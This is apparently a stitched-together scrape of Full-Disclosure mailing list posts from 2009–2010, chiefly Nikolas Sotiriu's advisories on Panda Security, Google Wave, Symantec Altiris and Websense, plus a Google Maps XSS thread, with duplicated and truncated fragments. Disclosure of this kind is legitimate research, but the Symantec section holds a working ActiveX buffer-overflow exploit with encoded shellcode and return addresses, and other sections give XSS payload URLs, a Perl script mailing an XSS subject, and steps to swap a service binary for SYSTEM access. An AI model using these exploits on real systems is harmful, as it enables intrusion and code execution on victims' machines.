Nikolas Sotiriu Disclosure Policy: http://sotiriu.de/policy.html Thanks to: Thierry Zoller: For the permission to use his Policy Background: === Panda Security for Product is the security solution for companies that need to protect their networks, mainly workstations and file servers. Panda Security for Business is centrally managed thanks to the AdminSecure Console, which allows monitoring the entire network, protecting your critical assets against all types of threats and optimizing productivity. (Product description from Panda Website) This vulnerability is similar to the following vulnerabilities in Panda products, which where discovered earlier: Sep 07 2006 3APA3A: http://www.securityfocus.com/bid/19891 Aug 02 2007 tarkus: http://www.securityfocus.com/bid/25186 Oct 31 2009 Protek: http://www.securityfocus.com/archive/1/507615 Nov 02 2009 Maxim: http://www.securityfocus.com/bid/36897 The earlier reported vulnerabilities only affected the Home user products. But the business products had the same bug. More interesting is, that Panda failed since 2006 each year by releasing the new version with the same old bug. Description: 1. 32Bit Version of Panda Security for Desktops/File Servers +--- During installation of Panda Security for Desktops/File Servers the permissions for installation folder %ProgramFiles%\Panda Software\AVTC\ by default are set to Everyone:Full Control. Few services (e.g. PAVSRV51.EXE) are started from this folder. Services are started under LocalSystem account. The 32bit Version of Panda Security for Desktops/File Servers installs the TruePrevent package by default, which protects the files in the installation directory from manipulation. If the TruePrevent Service (Panda TPSrv) is not running the files are completely unprotected. A normal user is not able to stop the service, but normally he can boot his workstation in SafeBoot mode, in which the TPSrv is not started and all services files can be manipulated. This can be exploited by: a. Boot the PC in SafeBoot mode, by pressing F8 during the boot process b. Rename PAVSRV51.exe to PAVSRV51.old in Panda folder c. Copy any application to PAVSRV51.exe d. Reboot Upon reboot trojaned application will be executed with LocalSystem account. Executable started as services: +-- %ProgramFiles%\PANDA SOFTWARE\AVTC\PSKMsSvc.exe (Desktop only) %ProgramFiles%\PANDA SOFTWARE\AVTC\PavSrv51.exe %ProgramFiles%\PANDA SOFTWARE\AVTC\PavFnSvr.exe %ProgramFiles%\PANDA SOFTWARE\AVTC\PSHost.exe %ProgramFiles%\PANDA SOFTWARE\AVTC\PsImSvc.exe %ProgramFiles%\PANDA SOFTWARE\AVTC\PsCtrlS.exe %ProgramFiles%\PANDA SOFTWARE\AVTC\TPSrv.exe 2. 64Bit Version of Panda Security for Desktops/File Servers
[Full-disclosure] NSOADV-2010-002: Google Wave Design Bugs
_ Security Advisory NSOADV-2010-002 _ _ Title: Google Wave Design Bugs Severity: Low Advisory ID:NSOADV-2010-002 Found Date: 16.11.2009 Date Reported: 18.11.2009 Release Date: 19.01.2010 Author: Nikolas Sotiriu (lofi) Mail: nso-research at sotiriu.de URL:http://sotiriu.de/adv/NSOADV-2010-002.txt Vendor: Google (http://www.google.com/) Affected Products: Google Wave Preview (Date: = 14.01.2010) Not Affected Component: Google Wave Preview (Date: = 14.01.2010) Remote Exploitable: Yes Local Exploitable: No Patch Status: partially patched Discovered by: Nikolas Sotiriu Disclosure Policy: http://sotiriu.de/policy.html Thanks to: Thierry Zoller: For the permission to use his Policy Background: === Google Wave is an online tool for real-time communication and collaboration. A wave can be both a conversation and a document where people can discuss and work together using richly formatted text, photos, videos, maps, and more. (Product description from Google Website) Description: All this possible attacks are the result of playing 4 hours with Google Wave. I didn't check all the funny stuff, which is possible with the Wave. 1. Gadget phishing attack: -- The Google Wave Gadget API can be used for phishing attacks. An attacker can build his own phishing Gadget, share it with his Google Wave contacts an hopefully get the login credentials from a user. This behavior is normal. The Problem is, that this bug makes it easier to steal logins. 2. Virus spreading attack: -- Uploads Files are not scanned for malicious code. An attacker could upload his malware to a wave and share it to his Google Wave contacts. Proof of Concept : == A proof of concept gadget can be found here: http://sotiriu.de/demos/phgadget.xml Solution: = 1. No changes made here. Workaround: Don't trust Waves. 2. Google builds in AV scanning. Disclosure Timeline (/MM/DD): = 2009.11.16: Vulnerability found 2009.11.17: Sent PoC, Advisory, Disclosure policy and planned disclosure date (2009.12.03) to Vendor 2009.11.23: Vendor response 2009.12.01: Ask for a status update, because the planned release date is 2009.12.03. 2009.12.03: Google Security Team asks for 2 more week to patch. 2009.12.03: Changed release date to 2009.12.17. 2009.12.15: Ask for a status update, because the planned release date is 2009.12.17. = No Response 2009.12.21: Ask for a status update. 2009.12.29: Google Security Team informs me, that there are no changes made before 2010.01.03. 2010.01.14: Google Security Team informs me, that uploaded files will be now scanned for malware. Google Gadgets will be not updated. 2010.01.19: Release of this Advisory ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Google Maps XSS (currently unpatched)
Looks like a realy quick fix from google. directly after i got the PoC it worked. Now it doesn't Am 12.01.2010 13:58, schrieb Michael Lenz: Your PoC generates: *Google* Sorry... We're sorry... ... but your computer or network may be sending automated queries. To protect our users, we can't process your request right now. See Google Help http://www.google.com/support/bin/answer.py?answer=86640 for more information. © 2009 Google - Google Home http://www.google.com So..? gaurav baruah schrieb: Google Maps XSS (currently unpatched) Discovered By - Pratul Agrawal (pratu...@gmail.com) Gaurav Baruah (baruah.gau...@gmail.com) PoC - http://maps.google.com/maps?f=qsource=s_qhl=engeocode=q=%3Cscript%3Ealert(%22Google%20Sucks%20!%22)%3C/script%3Evps=1sll=28.613554,77.20906sspn=0.009136,0.013797ie=UTF8 ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ gaurav baruah schrieb: Google Maps XSS (currently unpatched) Discovered By - Pratul Agrawal (pratu...@gmail.com) Gaurav Baruah (baruah.gau...@gmail.com) PoC - http://maps.google.com/maps?f=qsource=s_qhl=engeocode=q=%3Cscript%3Ealert(%22Google%20Sucks%20!%22)%3C/script%3Evps=1sll=28.613554,77.20906sspn=0.009136,0.013797ie=UTF8 ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] NSOADV-2010-001: Panda Security Local Privilege Escalation
_ Security Advisory NSOADV-2010-001 _ _ Title: Panda Security Local Privilege Escalation Severity: Medium Advisory ID:NSOADV-2010-001 Found Date: 02.2008 Date Reported: 30.11.2009 Release Date: 09.01.2010 Author: Nikolas Sotiriu (lofi) Mail: nso-research at sotiriu.de URL:http://sotiriu.de/adv/NSOADV-2010-001.txt Vendor: Panda Security (http://www.pandasecurity.com/) Affected Products: (Self tested) -Panda Security for Business 4.04.10 -Panda Security for Business with Exchange 4.04.10 -Panda Security for Enterprise 4.04.10 -Panda Internet Security 2010 (15.01.00) -Panda Global Protection 2010 (3.01.00) -Panda Antivirus Pro 2010 (9.01.00) -Panda Antivirus for Netbooks (9.01.00) (Provided by Panda) -Panda Global Protection 2009 -Panda Internet Security 2009 -Panda Antivirus Pro 2009 -Panda Internet Security 2008 -Panda Antivirus + Firewall 2008 -Panda Platinum 2007 Internet Security -Panda Platinum 2006 Internet Security Affected Component: Corporate Products: -Panda Security for Desktops 4.05.10 -Panda Security for File Servers 8.04.10 Remote Exploitable: No Local Exploitable: Yes Patch Status: Vendor released a patch (See Solution) Discovered by: Nikolas Sotiriu Disclosure Policy: http://sotiriu.de/policy.html Thanks to: Thierry Zoller: For the permission to use his Policy Background: === Panda Security for Product is the security solution for companies that need to protect their networks, mainly workstations and file servers. Panda Security for Business is centrally managed thanks to the AdminSecure Console, which allows monitoring the entire network, protecting your critical assets against all types of threats and optimizing productivity. (Product description from Panda Website) This vulnerability is similar to the following vulnerabilities in Panda products, which where discovered earlier: Sep 07 2006 3APA3A: http://www.securityfocus.com/bid/19891 Aug 02 2007 tarkus: http://www.securityfocus.com/bid/25186 Oct 31 2009 Protek: http://www.securityfocus.com/archive/1/507615 Nov 02 2009 Maxim: http://www.securityfocus.com/bid/36897 The earlier reported vulnerabilities only affected the Home user products. But the business products had the same bug. More interesting is, that Panda failed since 2006 each year by releasing the new version with the same old bug. Description: 1. 32Bit Version of Panda Security for Desktops/File Servers +--- During installation of Panda Security for Desktops/File Servers the permissions for installation folder %ProgramFiles%\Panda Software\AVTC\ by default are set to Everyone:Full Control. Few services (e.g. PAVSRV51.EXE) are started from this folder. Services are started under LocalSystem account. The 32bit Version of Panda Security for Desktops/File Servers installs the TruePrevent package by default, which protects the files in the installation directory from manipulation. If the TruePrevent Service (Panda TPSrv) is not running the files are completely unprotected. A normal user is not able to stop the service, but normally he can boot his workstation in SafeBoot mode, in which the TPSrv is not started and all services files can be manipulated. This can be exploited by: a. Boot the PC in SafeBoot mode, by pressing F8 during the boot process b. Rename PAVSRV51.exe to PAVSRV51.old in Panda folder c. Copy any application to PAVSRV51.exe d. Reboot Upon reboot trojaned application will be executed with LocalSystem account. Executable started as services: +-- %ProgramFiles%\PANDA SOFTWARE\AVTC\PSKMsSvc.exe (Desktop only) %ProgramFiles%\PANDA SOFTWARE\AVTC\PavSrv51.exe %ProgramFiles%\PANDA SOFTWARE\AVTC\PavFnSvr.exe %ProgramFiles%\PANDA SOFTWARE\AVTC\PSHost.exe %ProgramFiles%\PANDA SOFTWARE\AVTC\PsImSvc.exe %ProgramFiles%\PANDA SOFTWARE\AVTC\PsCtrlS.exe %ProgramFiles%\PANDA SOFTWARE\AVTC\TPSrv.exe 2. 64Bit Version of Panda Security for Desktops/File Servers +--- During installation of Panda Security
[Full-disclosure] NSOADV-2009-001: Symantec ConsoleUtilities ActiveX Control buffer overflow
_ Security Advisory NSOADV-2009-001 _ _ Title: Symantec ConsoleUtilities ActiveX Control Buffer Overflow Severity: Critical Advisory ID:NSOADV-2009-001 Found Date: 09.09.2009 Date Reported: 15.09.2009 Release Date: 02.11.2009 Author: Nikolas Sotiriu Mail: nso-research at sotiriu.de URL:http://sotiriu.de/adv/NSOADV-2009-001.txt Vendor: Symantec (http://www.symantec.com/) Affected Products: Symantec Altiris Notification Server 6.x Symantec Management Platform 7.0.x Symantec Altiris Deployment Solution 6.9.x Affected Component: ConsoleUtilities ActiveX Control V.6.0.0.1846 Not Affected Component: ConsoleUtilities ActiveX Control V.6.0.0.2000 Remote Exploitable: Yes Local Exploitable: No CVE-ID: CVE-2009-3031 Patch Status: Vendor released an patch Discovered by: Nikolas Sotiriu Disclosure Policy: http://sotiriu.de/policy.html Thanks to: Thierry Zoller: For the permission to use his Policy Background: === Altiris service-oriented management solutions provide a modular and future-proof approach to managing highly diverse and widely distributed IT infrastructures. They are open solutions that enable lifecycle integration of client, handheld, server, network and other IT assets with audit-ready security and automated operation. (Product description from Symantec Website) Description: During the first access of the Management Website an ActiveX Control will be installed (AeXNSConsoleUtilities.dll), in which the function BrowseAndSaveFile is vulnerable to a stack based buffer overflow. Name: ConsoleUtilities Class Vendor: Altiris, Inc. Type: ActiveX-Steuerelement Version: 6.0.0.1846 GUID: {B44D252D-98FC-4D5C-948C-BE868392A004} File: AeXNSConsoleUtilities.dll Folder: C:\WINDOWS\system32 Proof of Concept : == html titleNSOADV-2009-001/title object classid='clsid:B44D252D-98FC-4D5C-948C-BE868392A004' id='obj'/ /object script language='vbscript' Sub Submit_OnClick For i=0 to 2 If document.ret.os(i).checked Then target=document.ret.os(i).value End If Next EIP=unescape(target) arg1 = arg3 = arg4 = arg5 = junk=String(310, A) 'junk morejunk=String(18, unescape(%u0041)) 'more junk // windows/exec - 224 bytes // http://www.metasploit.com // Encoder: x86/call4_dword_xor // EXITFUNC=seh, CMD=calc.exe code=unescape(%uc92b%ue983%ue8ce%u%u%u5ec0%u7681%ue60e_ %u2dad%u8338%ufcee%uf4e2%u451a%u38a4%uade6%ub14d_ %u9c03%u5cff%uff6d%ub31d%ua1b4%u6aa6%u26f2%u105f_ %u1ae9%u1e67%u52d7%uf81c%u914a%u444c%u81e4%uf90d_ %ua029%uff2c%u5d04%u6f7f%uff6d%ub33d%u91a4%ue82c_ %ued6d%ubd55%ud926%u3967%ufd36%u70a6%u26fe%u1875_ %u7ee7%u04ce%u26af%ub319%u7be7%uc71c%u6dd7%uf981_ %ua029%uff2c%u4dde%ucc58%ud0e5%u03d5%u899b%uda58_ %u26be%u1c75%u7ee7%ub34b%ue6ea%u60a6%uacfa%ub3fe_ %u26e2%ue82c%ue96f%u1c09%uf6bd%u614c%ufcbc%ud8d2_ %uf2be%ub377%u46f4%u65ab%uac8c%ubda0%uad5f%u382d_ %uc5b6%ub31c%u2a89%uedd2%u535d%u0a23%uc50c%uad8b_ %u305b%uedd2%uabda%u3251%u5666%u4dcd%u16e3%u2b6a_ %uc294%u3847%u52b5%u5bf8%uc187%u164e%ud583%u3848) buf=junk+EIP+morejunk+break+code obj.BrowseAndSaveFile arg1, buf, arg3, arg4, arg5 End Sub /script h2Symantec ConsoleUtilities ActiveX Control Buffer overflow PoC/h2 Use it only for education or ethical pentesting! The author accepts no liability for damage caused by this tool.brNikolas Sotiriu (lofi) (http://www.sotiriu.de/adv/NSOADV-2009-001.txt), 02.11.2009br h3Some RET Infos:/h3 Overwrite EIP with (crash)br EIP=String(2, unescape(%u4141))brbr XP SP2 Ger shell32.dll JMP ESPbr EIP=unescape(%uaf0a%u77d5)brbr XP SP3 Ger shell32.dll JMP ESPbr EIP=unescape(%u30D7%u7E68)brbr form name=ret input type=radio name=os value=%u4141%u4141 DoSbr input type=radio name=os value=%uaf0a%u77d5 Windows XP SP2 Germanbr input type=radio name=os value=%u30D7%u7E68 Windows XP SP3 Germanbr input type=button name=Submit VALUE=Exploit /form img src=http://sotiriu.de/images/logo_wh_80.png; /html Solution: = Symantec Security Advisory: http://tinyurl.com/y9fakve Hotfix (KB49568): Deployment Solution 6.9 SP3 https://kb.altiris.com/display
[Full-disclosure] NSOADV-2009-003: Websense Email Security Cross Site Scripting
_ Security Advisory NSOADV-2009-003 _ _ Title: Websense Email Security Cross Site Scripting Severity: Low Advisory ID:NSOADV-2009-003 Found Date: 28.09.2009 Date Reported: 01.10.2009 Release Date: 20.10.2009 Author: Nikolas Sotiriu Mail: nso-research (at) sotiriu.de URL:http://sotiriu.de/adv/NSOADV-2009-003.txt Vendor: Websense (http://www.websense.com/) Affected Products: Websense Email Security v7.1 Personal Email Manager v7.1 Not Affected Products: Websense Email Security v7.1 Hotfix 4 Personal Email Manager v7.1 Hotfix 4 Remote Exploitable: Yes Local Exploitable: Yes Patch Status: Patched with Hotfix 4 Disclosure Policy: http://sotiriu.de/policy.html Thanks to: Thierry Zoller: for the permission to use his Policy Background: === Websense Email Security software incorporates multiple layers of real-time Web security and data security intelligence to provide leading email protection from converged email and Web 2.0 threats. It helps to manage outbound data leaks and compliance risk, and enables a consolidated security strategy with the trusted leader in Essential Information Protection. (Product description from Websense Website) The Websense Email Security Web Administrator is a webfrontend, which enables you to access the message administration, directory management and to view the log. Description: 1. XSS in webfrontend: -- The webfrontend do not properly sanitize some variables before being returned to the user. http://target:8181/web/msgList/viewmsg/actions/msgAnalyse.asp \ ?Queue=Network%20SecurityFileName=[XSS]IsolatedMessageID=[XSS] \ ServerName=[XSS]Dictionary=[XSS]Scoring=[XSS]MessagePart=[XSS] http://target:8181/web/msgList/viewmsg/actions/msgForwardToRis \ kFilter.asp?Queue=[XSS]FileName=[XSS]IsolatedMessageID=[XSS] \ ServerName=[XSS] http://target:8181/web/msgList/viewmsg/viewHeaders.asp?Queue= \ [XSS]FileName=[XSS]IsolatedMessageID=[XSS]ServerName=[XSS] This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of the Web Administrator frontend. 2. XSS in webfrontend through a Mail Subject: - The Subject of an email sent through the Websense Mail Security server is not properly sanitized before shown in the Web Administrator frontend. Script code like scriptalert('X')/script will be executed in the users's browser in context of the Web Administrator frontend. The Mail has to be hold in a Queue to execute the code if the administrator checks it. A Subject like VIAGRAscriptalert('XSS')/script will result in a hold in the Anti Spam Queue. Proof of Concept : == #!/usr/bin/perl use MIME::Lite; use Net::SMTP; (($server = $ARGV[0]) ($rcpt = $ARGV[1])) || die Usage: $0, server Recipient \n; my $from_address = 'x...@mail.com'; my $to_address = . $rcpt . ; my $mail_host = $server; my $subject = 'VIAGRA XSS File BODY ONLOAD=alert(\'XSS\')'; my $message_body = XSS Test File; $msg = MIME::Lite-new ( From = $from_address, To = $to_address, Subject = $subject, Type ='multipart/mixed' ) or die Error creating multipart container: $!\n; $msg-attach ( Type = 'TEXT', Data = $message_body ) or die Error adding the text message part: $!\n; MIME::Lite-send('smtp', $mail_host, Timeout=60); $msg-send; Solution: = Vendor released a patch. http://tinyurl.com/yhe3hqa Disclosure Timeline (/MM/DD): = 2009.09.28: Vulnerability found 2009.10.01: Ask for a PGP Key 2009.10.01: Websense sent there PGP Key 2009.10.01: Sent PoC, Advisory, Disclosure policy and planned disclosure date to Vendor 2009.10.08: Websense verifies the finding 2009.10.13: Websense fixed it. The path will be available in Version 7.2 which will be released in ~2 weeks 2009.10.13: Ask for a list of affected versions/products and changed the release date to 2009.10.29. (no response) 2009.10.20: Found the KB article and the Hotfix on Websense website 2009.10.20: Release of this advisory ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/